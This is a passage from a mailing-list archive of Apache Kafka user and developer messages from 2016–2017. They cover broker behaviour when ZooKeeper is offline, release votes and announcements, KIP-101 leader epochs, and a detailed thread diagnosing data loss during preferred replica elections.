> 6. start a console producer and produce some messages:
> > ./bin/kafka-console-producer.sh --broker-list
> localhost:9090,localhost:9091,localhost:9092 --topic t
>
> 7. notice the size of the broker logs grow with each message you send:
> > l /tmp/kafka-logs*/t-0
>
> 8. notice the consumer consuming the messages being produced
>
> Basically, zookeeper can be completely offline and your brokers will append
> to logs and process client requests just fine as long as it doesn't need to
> interact with zookeeper. Today, the only way a broker knows to stop
> accepting requests is when it receives instruction from the controller.
>
> I first realized this last July when debugging a small production data loss
> scenario that was a result of this[1]. Maybe this is an attempt at leaning
> towards availability over consistency. Personally I think that brokers
> should stop accepting requests when it disconnects from zookeeper.
>
> [1] The small production data loss scenario happens when accepting requests
> during the small window in between a broker's zookeeper session expiration
> and when the controller instructs the broker to stop accepting requests.
> During this time, the broker still thinks it leads partitions that are
> currently being led by another broker, effectively resulting in a window
> where the partition is led by two brokers. Clients can continue sending
> requests to the old leader, and for producers with low acknowledgement
> settings (like ack=1), their messages will be lost without the client
> knowing, as the messages are being appended to the phantom leader's logs
> instead of the true leader's logs.
>
> On Wed, Apr 19, 2017 at 7:56 AM, Shrikant Patel  wrote:
>
> > While we were testing, our producer had following configuration
> > max.in.flight.requests.per.connection=1, acks= all and retries=3.
> >
> > The entire producer side set is below. The consumer has manual offset
> > commit, it commit offset after it has successfully processed the message.
> >
> > Producer setting
> > bootstrap.servers= {point the F5 VS fronting Kafka cluster}
> > key.serializer= {appropriate value as per your cases}
> > value.serializer= {appropriate value as per your case}
> > acks= all
> > retries=3
> > ssl.key.password= {appropriate value as per your case}
> > ssl.keystore.location= {appropriate value as per your case}
> > ssl.keystore.password= {appropriate value as per your case}
> > ssl.truststore.location= {appropriate value as per your case}
> > ssl.truststore.password= {appropriate value as per your case}
> > batch.size=16384
> > client.id= {appropriate value as per your case, may help with debugging}
> > max.block.ms=65000
> > request.timeout.ms=3
> > security.protocol= SSL
> > ssl.enabled.protocols=TLSv1.2
> > ssl.keystore.type=JKS
> > ssl.protocol=TLSv1.2
> > ssl.truststore.type=JKS
> > max.in.flight.requests.per.connection=1
> > metadata.fetch.timeout.ms=6
> > reconnect.backoff.ms=1000
> > retry.backoff.ms=1000
> > max.request.size=1048576
> > linger.ms=0
> >
> > Consumer setting
> > bootstrap.servers= {point the F5 VS

new mail archive service from Apache

2017-03-01 Thread Jun Rao

Hi,

Just want to pass along this to the community. There is a new mail archive
service https://lists.apache.org. It's beta, but is the long-term solution
for official ASF mail archives, and offers much better searching/threading
than mail-archives.a.o does.

Thanks,

Jun

Re: [ANNOUNCE] Apache Kafka 0.10.2.0 Released

2017-02-22 Thread Jun Rao

Thanks for driving the release, Ewen.

Jun

On Wed, Feb 22, 2017 at 12:33 AM, Ewen Cheslack-Postava <ewe...@apache.org>
wrote:

> The Apache Kafka community is pleased to announce the release for Apache
> Kafka 0.10.2.0. This is a feature release which includes the completion
> of 15 KIPs, over 200 bug fixes and improvements, and more than 500 pull
> requests merged.
>
> All of the changes in this release can be found in the release notes:
> https://archive.apache.org/dist/kafka/0.10.2.0/RELEASE_NOTES.html
>
> Apache Kafka is a distributed streaming platform with four four core
> APIs:
>
> ** The Producer API allows an application to publish a stream records to
> one or more Kafka topics.
>
> ** The Consumer API allows an application to subscribe to one or more
> topics and process the stream of records produced to them.
>
> ** The Streams API allows an application to act as a stream processor,
> consuming an input stream from one or more topics and producing an
> output
> stream to one or more output topics, effectively transforming the input
> streams to output streams.
>
> ** The Connector API allows building and running reusable producers or
> consumers that connect Kafka topics to existing applications or data
> systems. For example, a connector to a relational database might capture
> every change to a table.three key capabilities:
>
>
> With these APIs, Kafka can be used for two broad classes of application:
>
> ** Building real-time streaming data pipelines that reliably get data
> between systems or applications.
>
> ** Building real-time streaming applications that transform or react to
> the
> streams of data.
>
>
> You can download the source release from
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.10.2.
> 0/kafka-0.10.2.0-src.tgz
>
> and binary releases from
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.10.2.
> 0/kafka_2.11-0.10.2.0.tgz
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.10.2.
> 0/kafka_2.10-0.10.2.0.tgz
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.10.2.
> 0/kafka_2.12-0.10.2.0.tgz
> (experimental 2.12 artifact)
>
> Thanks to the 101 contributors on this release!
>
> Akash Sethi, Alex Loddengaard, Alexey Ozeritsky, amethystic, Andrea
> Cosentino, Andrew Olson, Andrew Stevenson, Anton Karamanov, Antony
> Stubbs, Apurva Mehta, Arun Mahadevan, Ashish Singh, Balint Molnar, Ben
> Stopford, Bernard Leach, Bill Bejeck, Colin P. Mccabe, Damian Guy, Dan
> Norwood, Dana Powers, dasl, Derrick Or, Dong Lin, Dustin Cote, Edoardo
> Comar, Edward Ribeiro, Elias Levy, Emanuele Cesena, Eno Thereska, Ewen
> Cheslack-Postava, Flavio Junqueira, fpj, Geoff Anderson, Guozhang Wang,
> Gwen Shapira, Hikiko Murakami, Himani Arora, himani1, Hojjat Jafarpour,
> huxi, Ishita Mandhan, Ismael Juma, Jakub Dziworski, Jan Lukavsky, Jason
> Gustafson, Jay Kreps, Jeff Widman, Jeyhun Karimov, Jiangjie Qin, Joel
> Koshy, Jon Freedman, Joshi, Jozef Koval, Json Tu, Jun He, Jun Rao,
> Kamal, Kamal C, Kamil Szymanski, Kim Christensen, Kiran Pillarisetty,
> Konstantine Karantasis, Lihua Xin, LoneRifle, Magnus Edenhill, Magnus
> Reftel, Manikumar Reddy O, Mark Rose, Mathieu Fenniak, Matthias J. Sax,
> Mayuresh Gharat, MayureshGharat, Michael Schiff, Mickael Maison,
> MURAKAMI Masahiko, Nikki Thean, Olivier Girardot, pengwei-li, pilo,
> Prabhat Kashyap, Qian Zheng, Radai Rosenblatt, radai-rosenblatt, Raghav
> Kumar Gautam, Rajini Sivaram, Rekha Joshi, rnpridgeon, Ryan Pridgeon,
> Sandesh K, Scott Ferguson, Shikhar Bhushan, steve, Stig Rohde Døssing,
> Sumant Tambe, Sumit Arrawatia, Theo, Tim Carey-Smith, Tu Yang, Vahid
> Hashemian, wangzzu, Will Marshall, Xavier Léauté, Xavier Léauté, Xi Hu,
> Yang Wei, yaojuncn, Yuto Kawamura
>
> We welcome your help and feedback. For more information on how to
> report problems, and to get involved, visit the project website at
> http://kafka.apache.org/
>
> Thanks,
> Ewen
>

Re: [kafka-clients] [VOTE] 0.10.2.0 RC2

2017-02-15 Thread Jun Rao

Hi, Ewen,

Thanks for running the release. +1. Verified quickstart on 2.10 binary.

Jun

On Tue, Feb 14, 2017 at 10:39 AM, Ewen Cheslack-Postava 
wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the third candidate for release of Apache Kafka 0.10.2.0.
>
> This is a minor version release of Apache Kafka. It includes 19 new KIPs.
> See the release notes and release plan (https://cwiki.apache.org/conf
> luence/display/KAFKA/Release+Plan+0.10.2.0) for more details. A few
> feature highlights: SASL-SCRAM support, improved client compatibility to
> allow use of clients newer than the broker, session windows and global
> tables in the Kafka Streams API, single message transforms in the Kafka
> Connect framework.
>
> Important note: in addition to the artifacts generated using JDK7 for
> Scala 2.10 and 2.11, this release also includes experimental artifacts
> built using JDK8 for Scala 2.12.
>
> Important code changes since RC1 (non-docs, non system tests):
>
> KAFKA-4756; The auto-generated broker id should be passed to
> MetricReporter.configure
> KAFKA-4761; Fix producer regression handling small or zero batch size
>
> Release notes for the 0.10.2.0 release:
> http://home.apache.org/~ewencp/kafka-0.10.2.0-rc2/RELEASE_NOTES.html
>
> *** Please download, test and vote by February 17th 5pm ***
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~ewencp/kafka-0.10.2.0-rc2/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/
>
> * Javadoc:
> http://home.apache.org/~ewencp/kafka-0.10.2.0-rc2/javadoc/
>
> * Tag to be voted upon (off 0.10.2 branch) is the 0.10.2.0 tag:
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=
> 5712b489038b71ed8d5a679856d1dfaa925eadc1
>
>
> * Documentation:
> http://kafka.apache.org/0102/documentation.html
>
> * Protocol:
> http://kafka.apache.org/0102/protocol.html
>
> * Successful Jenkins builds for the 0.10.2 branch:
> Unit/integration tests: https://builds.apache.org/job/
> kafka-0.10.2-jdk7/77/
> System tests: https://jenkins.confluent.io/job/system-test-kafka-0.10.2/
> 29/
>
> /**
>
> Thanks,
> Ewen
>
> --
> You received this message because you are subscribed to the Google Groups
> "kafka-clients" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to kafka-clients+unsubscr...@googlegroups.com.
> To post to this group, send email to kafka-clie...@googlegroups.com.
> Visit this group at https://groups.google.com/group/kafka-clients.
> To view this discussion on the web visit https://groups.google.com/d/
> msgid/kafka-clients/CAE1jLMORScgr1RekNgY0fLykSPh_%
> 2BgkRYN7vok3fz1ou%3DuW3kw%40mail.gmail.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>

Re: Quick replication question - loss of committed messages during preferred replica election

2017-01-24 Thread Jun Rao

Hi, Mark,

Thanks for pointing this out. This issue is fixed in 0.10.0.0 in
https://issues.apache.org/jira/browse/KAFKA-725.

In 0.9.0, what's going to happen is the consumer will get an unknown error.
Normally, the consumer will only reset the offset if it gets an
OffsetOutOfRangeException. If it gets an unknown error, it's supposed to
just retry the same fetch request without resetting the offset. Since
Connect uses the java consumer, I'd expect it to behave in the same way.
Were you able to verify that it behaves differently? In any case, do you
think you can try the latest stable release?

Jun

On Mon, Jan 23, 2017 at 11:53 AM, Mark Smith <m...@qq.is> wrote:

> Jun,
>
> Thanks for the reply. This makes sense, I think. One followup question:
>
> During the failover when the new-leader has a stale HWM, is it possible
> for this broker to return an error to consumers who are consuming
> between HWM and LEO?
>
> I saw a comment on a document that says the leader could, legally,
> return an empty response temporarily until the HWM has caught up -- but
> I've examined the code (0.9) and this does not seem to be implemented.
> Instead, it looks like we get IllegalArgumentException.
>
> 1) Consumer fetches from original leader, sees latest HWM
> 2) Failover happens
> 3) New leader has stale HWM
> 4) Consumer sends next fetch to new leader, with start offset = latest
> HWM (from step 1)
> 5) New leader returns IllegalArgumentException because start offset >
> stale HWM (from step 3)
>
> It looks like what then happened is that the client, Kafka Connect in
> our case, reset its offset to 0 and started reconsuming from the head of
> the log. This causes significant message churn and is unnecessary,
> although I'm not entirely sure of the correct fix.
>
> I'm basing this on the code I'm looking at from 0.9:
>
> * fetchMessages is called, and fetchOnlyCommitted is true (request is
> from a consumer, not a replica)
>
> * readFromLocalLog is called, sets maxOffsetOpt:
>
>   val maxOffsetOpt = if (readOnlyCommitted)
> Some(localReplica.highWatermark.messageOffset)
>   else
> None
>
> * read is later called:
>
>   log.read(offset, fetchSize, maxOffsetOpt)
>
> * read then throws the exception:
>
> // calculate the length of the message set to read based on whether
> or not they gave us a maxOffset
> val length =
>   maxOffset match {
> case Some(offset) => {
>   // there is a max offset, translate it to a file position and
>   use that to calculate the max read size
>   if(offset < startOffset)
> throw new IllegalArgumentException("Attempt to read with a
> maximum offset (%d) less than the start offset
> (%d).".format(offset, startOffset))
>
> * readFromLocalLog catches and returns:
>
>   case e: Throwable =>
> BrokerTopicStats.getBrokerTopicStats(topic).
> failedFetchRequestRate.mark()
> BrokerTopicStats.getBrokerAllTopicsStats().
> failedFetchRequestRate.mark()
> error("Error processing fetch operation on partition [%s,%d]
> offset %d".format(topic, partition, offset), e)
> LogReadResult(FetchDataInfo(LogOffsetMetadata.
> UnknownOffsetMetadata,
> MessageSet.Empty), -1L, fetchSize, false, Some(e))
>
> The consumer then restarts back to the beginning. This looks to be the
> source of our 'data loss', which isn't actually loss but a bad
> interaction of failover and catching a stale HWM leading to errors being
> thrown by the broker when it maybe doesn't need to.
>
> Thoughts?
>
> --
> Mark Smith
> m...@qq.is
>
>
> On Wed, Jan 18, 2017, at 02:11 PM, Jun Rao wrote:
> > Hi, Mark,
> >
> > Your understanding about HWM transition is correct. When the leader
> > changes
> > due to preferred leader election, the new leader will have all the
> > committed messages, but a potentially stale HWM. The new leader won't do
> > any truncation to its local log though. Instead, it will try to commit
> > all
> > messages in its local log. It will advance HWM after all followers's LEO
> > have advanced.
> >
> > Thanks,
> >
> > Jun
> >
> > On Wed, Jan 18, 2017 at 12:13 AM, Mark Smith <m...@qq.is> wrote:
> >
> > > Hi all,
> > >
> > > Here at Dropbox we're still (off and on) trying to get to the bottom of
> > > the data loss that's been hitting our largest cluster during preferred
> > > replica elections. It unfortunately has repeated a few times, so now we
> > > have a question.
> >

Re: timeindex file timestamp mismatch (0.10.1.0)

2017-01-20 Thread Jun Rao

Meghana,

You are probably seeing this when running the DumpLogSegment tool on the
active (last) log segment. DumpLogSegment tool is supposed to only be used
on the index of the immutable segments (i.e., when they are rolled). We
preallocate the index on the active segment with 0 values. So,
DumpLogSegment doesn't know the actual valid entries in the index and will
report those 0 values as errors. If you wait for the log segment to roll,
you should see the timeindex resized to 0 length.

Thanks,

Jun

On Fri, Jan 20, 2017 at 8:20 AM, Meghana Narasimhan <
mnarasim...@bandwidth.com> wrote:

> Hi,
> I'm testing upgrading our cluster from 0.9.0.1 to 0.10.1.0 on 2 clusters A
> and B. I have upgraded only the inter.broker.protocol.version to 0.10.1.0.
> The log.message.format.version is still 0.9.0.1.
>
> I'm writing test data from a java producer to the upgraded cluster A. As
> expected the .timeindex files get created. I understand that the timestamp
> will be appended to offsets only when I upgrade the
> log.message.format.version. But when I run the following command, I get the
> following.
>
> kafka-run-class kafka.tools.DumpLogSegments --files
> /mnt/data/kafka-logs/upgrade_test-2/14500426.timeindex
> Dumping /mnt/data/kafka-logs/upgrade_test-2/14500426.timeindex
> timestamp: 0 offset: 14500426
> Found timestamp mismatch in
> :/mnt/data/kafka-logs/upgrade_test-2/14500426.timeindex
>   Index timestamp: 0, log timestamp: -1
>   Index timestamp: 0, log timestamp: -1
> Found out of order timestamp in
> :/mnt/data/kafka-logs/upgrade_test-2/14500426.timeindex
>   Index timestamp: 0, Previously indexed timestamp: 0
>
> What does the timestamp mismatch indicate ? is it an error ?
>
> Also the other cluster, Cluster B is mirroring data from cluster A, and
> when the run the dumplogSegment command on that cluster I get something
> like this..
>
>
> timestamp: 0 offset: 1124701
> timestamp: 0 offset: 1124701
> timestamp: 0 offset: 1124701
> timestamp: 0 offset: 1124701
> timestamp: 0 offset: 1124701
> timestamp: 0 offset: 1124701
> timestamp: 0 offset: 1124701
> timestamp: 0 offset: 1124701
>
> Any inputs will be of great help.
> Thanks,
> Meghana
>

Re: Quick replication question - loss of committed messages during preferred replica election

2017-01-18 Thread Jun Rao

Hi, Mark,

Your understanding about HWM transition is correct. When the leader changes
due to preferred leader election, the new leader will have all the
committed messages, but a potentially stale HWM. The new leader won't do
any truncation to its local log though. Instead, it will try to commit all
messages in its local log. It will advance HWM after all followers's LEO
have advanced.

Thanks,

Jun

On Wed, Jan 18, 2017 at 12:13 AM, Mark Smith  wrote:

> Hi all,
>
> Here at Dropbox we're still (off and on) trying to get to the bottom of
> the data loss that's been hitting our largest cluster during preferred
> replica elections. It unfortunately has repeated a few times, so now we
> have a question.
>
> To make sure we're understanding, message commit status (replication)
> basically goes through three phases:
>
> * Messages Uncommitted; the leader has received new production, and the
> followers receive the messages in a Fetch request. Everybody's LEO is
> incremented, but HWMs are unchanged. No messages are considered
> committed.
>
> * Leader Committed; in the subsequent Fetch, the follower says "my LEO
> is now X" and the leader records that and then updates its HWM to be the
> minimum of all follower's LEO. After this stage, the messages are
> committed -- only on the leader. The follower's HWM is still in the
> past.
>
> * Leader+Follower Committed; or HWM Replication Fetch; in this final
> fetch, the follower is informed of the new HWM by the leader and
> increments its own HWM accordingly.
>
> These aren't actually distinct phases of course, they're just part of
> individual fetch requests, but I think logically the HWM transitions can
> be thought of in those way. I.e., "message uncommitted", "leader
> committed", "leader+follower committed".
>
> Is this understanding accurate?
>
> If so, is it just a fact that (right now) a preferred replica election
> has a small change of electing a follower and causing message loss of
> any "leader committed" messages (i.e., messages that are not considered
> committed on the follower that is now getting promoted)?
>
> We can't find anything in the protocol that would guard against this.
> I've also been reading KIP-101 and it looks like this is being referred
> to sort-of in Scenario 1, however, that scenario is mentioning broker
> failure -- and my concern is that data loss is possible even in the
> normal scenario with no broker failures.
>
> Any thoughts?
>
> --
> Mark Smith
> m...@qq.is
>

Re: [ANNOUNCE] New committer: Grant Henke

2017-01-11 Thread Jun Rao

Grant,

Thanks for all your contribution! Congratulations!

Jun

On Wed, Jan 11, 2017 at 2:51 PM, Gwen Shapira  wrote:

> The PMC for Apache Kafka has invited Grant Henke to join as a
> committer and we are pleased to announce that he has accepted!
>
> Grant contributed 88 patches, 90 code reviews, countless great
> comments on discussions, a much-needed cleanup to our protocol and the
> on-going and critical work on the Admin protocol. Throughout this, he
> displayed great technical judgment, high-quality work and willingness
> to contribute where needed to make Apache Kafka awesome.
>
> Thank you for your contributions, Grant :)
>
> --
> Gwen Shapira
> Product Manager | Confluent
> 650.450.2760 | @gwenshap
> Follow us: Twitter | blog
>

Re: [VOTE] Vote for KIP-101 - Leader Epochs

2017-01-05 Thread Jun Rao

Hi, Ben,

Thanks for the updated KIP. +1

1) In OffsetForLeaderEpochResponse, start_offset probably should be
end_offset since it's the end offset of that epoch.
3) That's fine. We can fix KAFKA-1120 separately.

Jun


On Thu, Jan 5, 2017 at 11:11 AM, Ben Stopford <b...@confluent.io> wrote:

> Hi Jun
>
> Thanks for raising these points. Thorough as ever!
>
> 1) Changes made as requested.
> 2) Done.
> 3) My plan for handing returning leaders is to simply to force the Leader
> Epoch to increment if a leader returns. I don't plan to fix KAFKA-1120 as
> part of this KIP. It is really a separate issue with wider implications.
> I'd be happy to add KAFKA-1120 into the release though if we have time.
> 4) Agreed. Not sure exactly how that's going to play out, but I think we're
> on the same page.
>
> Please could
>
> Cheers
> B
>
> On Thu, Jan 5, 2017 at 12:50 AM Jun Rao <j...@confluent.io> wrote:
>
> > Hi, Ben,
> >
> > Thanks for the proposal. Looks good overall. A few comments below.
> >
> > 1. For LeaderEpochRequest, we need to include topic right? We probably
> want
> > to follow other requests by nesting partition inside topic? For
> > LeaderEpochResponse,
> > do we need to return leader_epoch? I was thinking that we could just
> return
> > an end_offset, which is the next offset of the last message in the
> > requested leader generation. Finally, would OffsetForLeaderEpochRequest
> be
> > a better name?
> >
> > 2. We should bump up both the produce request and the fetch request
> > protocol version since both include the message set.
> >
> > 3. Extending LeaderEpoch to include Returning Leaders: To support this,
> do
> > you plan to use the approach that stores  CZXID in the broker
> registration
> > and including the CZXID of the leader in /brokers/topics/[topic]/
> > partitions/[partitionId]/state in ZK?
> >
> > 4. Since there are a few other KIPs involving message format too, it
> would
> > be useful to consider if we could combine the message format changes in
> the
> > same release.
> >
> > Thanks,
> >
> > Jun
> >
> >
> > On Wed, Jan 4, 2017 at 9:24 AM, Ben Stopford <b...@confluent.io> wrote:
> >
> > > Hi All
> > >
> > > We’re having some problems with this thread being subsumed by the
> > > [Discuss] thread. Hopefully this one will appear distinct. If you see
> > more
> > > than one, please use this one.
> > >
> > > KIP-101 should now be ready for a vote. As a reminder the KIP proposes
> a
> > > change to the replication protocol to remove the potential for replicas
> > to
> > > diverge.
> > >
> > > The KIP can be found here:  https://cwiki.apache.org/confl
> > > uence/display/KAFKA/KIP-101+-+Alter+Replication+Protocol+to+
> > > use+Leader+Epoch+rather+than+High+Watermark+for+Truncation <
> > > https://cwiki.apache.org/confluence/display/KAFKA/KIP-101+-
> > > +Alter+Replication+Protocol+to+use+Leader+Epoch+rather+
> > > than+High+Watermark+for+Truncation>
> > >
> > > Please let us know your vote.
> > >
> > > B
> > >
> > >
> > >
> > >
> > >
> >
>

Re: [VOTE] Vote for KIP-101 - Leader Epochs

2017-01-04 Thread Jun Rao

Hi, Ben,

Thanks for the proposal. Looks good overall. A few comments below.

1. For LeaderEpochRequest, we need to include topic right? We probably want
to follow other requests by nesting partition inside topic? For
LeaderEpochResponse,
do we need to return leader_epoch? I was thinking that we could just return
an end_offset, which is the next offset of the last message in the
requested leader generation. Finally, would OffsetForLeaderEpochRequest be
a better name?

2. We should bump up both the produce request and the fetch request
protocol version since both include the message set.

3. Extending LeaderEpoch to include Returning Leaders: To support this, do
you plan to use the approach that stores  CZXID in the broker registration
and including the CZXID of the leader in /brokers/topics/[topic]/
partitions/[partitionId]/state in ZK?

4. Since there are a few other KIPs involving message format too, it would
be useful to consider if we could combine the message format changes in the
same release.

Thanks,

Jun

On Wed, Jan 4, 2017 at 9:24 AM, Ben Stopford  wrote:

> Hi All
>
> We’re having some problems with this thread being subsumed by the
> [Discuss] thread. Hopefully this one will appear distinct. If you see more
> than one, please use this one.
>
> KIP-101 should now be ready for a vote. As a reminder the KIP proposes a
> change to the replication protocol to remove the potential for replicas to
> diverge.
>
> The KIP can be found here:  https://cwiki.apache.org/confl
> uence/display/KAFKA/KIP-101+-+Alter+Replication+Protocol+to+
> use+Leader+Epoch+rather+than+High+Watermark+for+Truncation <
> https://cwiki.apache.org/confluence/display/KAFKA/KIP-101+-
> +Alter+Replication+Protocol+to+use+Leader+Epoch+rather+
> than+High+Watermark+for+Truncation>
>
> Please let us know your vote.
>
> B
>
>
>
>
>

Re: [VOTE] 0.10.1.1 RC1

2016-12-19 Thread Jun Rao

Hi, Guozhang,

Thanks for preparing the release. Verified quickstart. +1

Jun

On Thu, Dec 15, 2016 at 1:29 PM, Guozhang Wang  wrote:

> Hello Kafka users, developers and client-developers,
>
> This is the second, and hopefully the last candidate for the release of
> Apache Kafka 0.10.1.1 before the break. This is a bug fix release and it
> includes fixes and improvements from 30 JIRAs. See the release notes for
> more details:
>
> http://home.apache.org/~guozhang/kafka-0.10.1.1-rc1/RELEASE_NOTES.html
>
> *** Please download, test and vote by Tuesday, 20 December, 8pm PT ***
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS
>
> * Release artifacts to be voted upon (source and binary):
> http://home.apache.org/~guozhang/kafka-0.10.1.1-rc1/
>
> * Maven artifacts to be voted upon:
> https://repository.apache.org/content/groups/staging/org/apache/kafka/
>
> NOTE the artifacts include the ones built from Scala 2.12.1 and Java8,
> which are treated a pre-alpha artifacts for the Scala community to try and
> test it out:
>
> https://repository.apache.org/content/groups/staging/org/
> apache/kafka/kafka_2.12/0.10.1.1/
>
> We will formally add the scala 2.12 support in future minor releases.
>
>
> * Javadoc:
> http://home.apache.org/~guozhang/kafka-0.10.1.1-rc1/javadoc/
>
> * Tag to be voted upon (off 0.10.0 branch) is the 0.10.0.1-rc0 tag:
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=
> c3638376708ee6c02dfe4e57747acae0126fa6e7
>
>
> Thanks,
> Guozhang
>
> --
> -- Guozhang
>

Re: Investigating apparent data loss during preferred replica election

2016-11-21 Thread Jun Rao

Hi, Mark,

So you did the manual leader election after the cluster is stabilized (i.e,
all replicas are in sync)? Then, it may not be related to the issue that I
described.

If there is just a single leadership change, what you described shouldn't
happen by design. I modified your steps to the following according to the
design and I am not sure how the message can be lost.

1. Starting point: Leader and Replica both only have up to message #36, HW
is at 37
2. Client produces new message with required.acks=all at offset 37
3.  the produce request is blocked
4. Replica fetches messages at offset 37
5. Leader's HW still at 37 and the produce request still blocked
5.1 Replica receives message at 37 and appends it to local log.
5.2 Replica fetches messages at offset 38
5.3 Leader's HW moves to 38 and the produce request is unblocked
5.4 Replica's HW still at 37
6. PREFERRED REPLICA ELECTION BEGIN
8. Replica becomes leader; no truncation is done; message at offset 37 is
preserved; HW still at 37
9. Connect issues a fetch request at 38 to replica and gets an empty
response instead of OffsetOutOfRangeException since the log end offset is
at 38.
9. Leader becomes follower; truncate to HW 38, keeping message at offset 37.
10. Leader starts fetch from offset 38
11. Replica moves HW to 38
12. Message #37 is preserved in both replicas and is not lost

BTW, do you have unclean leader election disabled? Is this issue
reproducible? If so, we can enable some debug level logging to see what's
causing this. Now, I am also not sure if this is a broker side issue or a
consumer side issue.

Thanks,

Jun

On Mon, Nov 21, 2016 at 5:20 PM, Mark Smith <m...@qq.is> wrote:

> Jun,
>
> Yeah, I probably have an off-by-one issue in the HW description. I think
> you could pick any number here and the problem remains -- could you read
> through the steps I posted and see if they logically make sense, numbers
> aside?
>
> We definitely lost data in 4 partitions of the 8,000 that were elected,
> and there was only a single election for each partition. We had done a
> rolling restart hours before, but that had been done for a long time and
> everything was stable. We do not allow automatic election, it's a manual
> process that we initiate after the cluster has stabilized.
>
> So in this case, I still don't think any discussion about
> multiple-failovers is germane to the problem we saw. Each of our partitions
> only had a single failover, and yet 4 of them still truncated committed
> data.
>
> --
> Mark Smith
> m...@qq.is
>
>
> On Mon, Nov 21, 2016, at 05:12 PM, Jun Rao wrote:
>
> Hi, Mark,
>
> Hmm, the committing of a message at offset X is the equivalent of saying
> that the HW is at offset X + 1. So, in your example, if the producer
> publishes a new message at offset 37, this message won't be committed
> (i.e., HW moves to offset 38) until the leader sees the follower fetch from
> offset 38 (not offset 37). At that point, the follower would have received
> message at offset 37 in the fetch response and appended that message to its
> local log. If the follower now becomes the new leader, message at offset 37
> is preserved.
>
> The problem that I described regarding data loss can happen during a
> rolling restart. Suppose that you have 3 replicas A, B, and C. Let's say A
> is the preferred the leader, but during the deployment, the leader gets
> moved to replica B at some point and all 3 replicas are in sync. A new
> message is produced at offset 37 and is committed (leader's HW =38).
> However, the HW in replica A is still at 37. Now, we try to shutdown broker
> B and the leader gets moved to replica C. Replica A starts to follow
> replica C and it first truncates to HW 37, which removes the message at
> offset 37. Now, preferred leader logic kicks in and the leadership switches
> again to replica A. Since A doesn't have message at offset 37 any more and
> all followers copy messages from replica A, message at offset 37 is lost.
>
> With KAFKA-3670, in the above example, when shutting down broker B, the
> leader will be directly moved to replica A since it's a preferred replica.
> So the above scenario won't happen.
>
> The more complete fix is in KAFKA-1211. The logic for getting the latest
> generation snapshot is just a proposal and is not in the code base yet.
>
> Thanks,
>
> Jun
>
> On Mon, Nov 21, 2016 at 3:20 PM, Mark Smith <m...@qq.is> wrote:
>
> Jun,
>
> Thanks for the reply!
>
> I am aware the HW won't advance until the in-sync replicas have
> _requested_ the messages. However, I believe the issue is that the
> leader has no guarantee the replicas have _received_ the fetch response.
> There is no second-phase to the commit.
>
> So, in the particular case where a leader transition happens, I believe
>

Re: Investigating apparent data loss during preferred replica election

2016-11-21 Thread Jun Rao

Hi, Mark,

Hmm, the committing of a message at offset X is the equivalent of saying
that the HW is at offset X + 1. So, in your example, if the producer
publishes a new message at offset 37, this message won't be committed
(i.e., HW moves to offset 38) until the leader sees the follower fetch from
offset 38 (not offset 37). At that point, the follower would have received
message at offset 37 in the fetch response and appended that message to its
local log. If the follower now becomes the new leader, message at offset 37
is preserved.

The problem that I described regarding data loss can happen during a
rolling restart. Suppose that you have 3 replicas A, B, and C. Let's say A
is the preferred the leader, but during the deployment, the leader gets
moved to replica B at some point and all 3 replicas are in sync. A new
message is produced at offset 37 and is committed (leader's HW =38).
However, the HW in replica A is still at 37. Now, we try to shutdown broker
B and the leader gets moved to replica C. Replica A starts to follow
replica C and it first truncates to HW 37, which removes the message at
offset 37. Now, preferred leader logic kicks in and the leadership switches
again to replica A. Since A doesn't have message at offset 37 any more and
all followers copy messages from replica A, message at offset 37 is lost.

With KAFKA-3670, in the above example, when shutting down broker B, the
leader will be directly moved to replica A since it's a preferred replica.
So the above scenario won't happen.

The more complete fix is in KAFKA-1211. The logic for getting the latest
generation snapshot is just a proposal and is not in the code base yet.

Thanks,

Jun

On Mon, Nov 21, 2016 at 3:20 PM, Mark Smith <m...@qq.is> wrote:

> Jun,
>
> Thanks for the reply!
>
> I am aware the HW won't advance until the in-sync replicas have
> _requested_ the messages. However, I believe the issue is that the
> leader has no guarantee the replicas have _received_ the fetch response.
> There is no second-phase to the commit.
>
> So, in the particular case where a leader transition happens, I believe
> this race condition exists (and I'm happy to be wrong here, but it looks
> feasible and explains the data loss I saw):
>
> 1. Starting point: Leader and Replica both only have up to message #36
> 2. Client produces new message with required.acks=all
> 3. Leader commits message #37, but HW is still #36, the produce request
> is blocked
> 4. Replica fetches messages (leader has RECEIVED the fetch request)
> 5. Leader then advances HW to #37 and unblocks the produce request,
> client believes it's durable
> 6. PREFERRED REPLICA ELECTION BEGIN
> 7. Replica starts become-leader process
> 8. Leader finishes sending fetch response, replica is just now seeing
> message #37
> 9. Replica throws away fetch response from step 4 because it is now
> becoming leader (partition has been removed from partitionMap so it
> looks like data is ignored)
> 10. Leader starts become-follower
> 11. Leader truncates to replica HW offset of #36
> 12. Message #37 was durably committed but is now lost
>
> For the tickets you linked:
>
> https://issues.apache.org/jira/browse/KAFKA-3670
> * There was no shutdown involved in this case, so this shouldn't be
> impacting.
>
> https://issues.apache.org/jira/browse/KAFKA-1211
> * I've read through this but I'm not entirely sure if it addresses the
> above. I don't think it does, though. I don't see a step in the ticket
> about become-leader making a call to the old leader to get the latest
> generation snapshot?
>
> --
> Mark Smith
> m...@qq.is
>
> On Fri, Nov 18, 2016, at 10:52 AM, Jun Rao wrote:
> > Mark,
> >
> > Thanks for reporting this. First, a clarification. The HW is actually
> > never
> > advanced until all in-sync followers have fetched the corresponding
> > message. For example, in step 2, if all follower replicas issue a fetch
> > request at offset 10, it serves as an indication that all replicas have
> > received messages up to offset 9. So,only then, the HW is advanced to
> > offset 10 (which is not inclusive).
> >
> > I think the problem that you are seeing are probably caused by two known
> > issues. The first one is
> > https://issues.apache.org/jira/browse/KAFKA-1211.
> > The issue is that the HW is propagated asynchronously from the leader to
> > the followers. If the leadership changes multiple time very quickly, what
